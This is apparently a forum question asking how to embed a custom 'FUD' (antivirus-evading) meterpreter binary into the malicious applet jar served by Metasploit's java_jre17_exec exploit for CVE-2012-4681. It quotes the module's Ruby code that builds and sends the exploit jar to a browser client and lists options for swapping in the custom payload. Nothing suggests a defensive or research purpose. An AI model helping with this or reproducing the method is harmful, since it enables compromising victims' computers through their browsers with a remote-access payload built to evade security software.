I'm trying to use java_jre17_exec with an applet having my custom exe meterpreter payload.
I've generated a FUD meterpreter binary and I want to embed it into a jar so I could use it with java_jre17_exec.
Here's the exploit:
/opt/metasploit/msf3/modules/exploits/multi/browser/java_jre17_exec.rb
The interesting lines are:
p = regenerate_payload(cli)
jar = p.encoded_jar
paths.each do |path|
1.upto(path.length - 1) do |idx|
full = path[0,idx].join("/") + "/"
if !(jar.entries.map{|e|e.name}.include?(full))
jar.add_file(full, '')
end
end
fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-4681", path ), "rb")
data = fd.read(fd.stat.size)
jar.add_file(path.join("/"), data)
fd.close
#jar.each do |num| --------- tried to see what does the jar array contain, but it doesen't show up in the console. am i doing it wrong?
#puts num
#end
end
print_status("Sending Applet.jar")
send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
handler( cli )
end
I think "jar.pack" is the final result.
So I have the following options:
1)Have the "p" variable on the first line carry my custom binary, but I don't know which format "regenerate_payload()" accepts;
2)Create my own jar and replace it with "jar.pack".
3)Use "custom/generic" to supply the custom binary's shellcode, but unfortunately it doesen't support it. Why?
Do you have some ideas?
Thanks.
